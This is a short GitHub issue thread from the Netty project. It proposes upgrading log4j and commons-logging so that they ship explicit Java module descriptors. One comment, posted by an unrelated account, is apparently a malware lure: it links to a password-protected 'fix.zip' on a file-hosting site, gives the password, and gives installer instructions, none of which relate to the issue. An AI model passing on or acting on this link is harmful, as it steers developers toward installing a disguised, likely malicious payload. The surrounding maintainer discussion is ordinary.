### ISSUE TITLE
Consider logging dependencies upgrade

### ISSUE THREAD

**Issue by vietj** [netty/netty#14259]
Some logging libraries integrated by Netty do not support explicit modules in their current version

- log4j: named automatic
- commons logging : automatic module only

Recent version do support explicit modules

- log4j 2.23.1 ships a module-info descriptor
- commons logging 1.3.4 ships a module-info descriptor

I recommend upgrading at least these libraries in Netty 4.2 branch

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by normanmaurer** [comment]
Sound slike a plan

**Comment by vietj** [comment]
will provide a PR soon
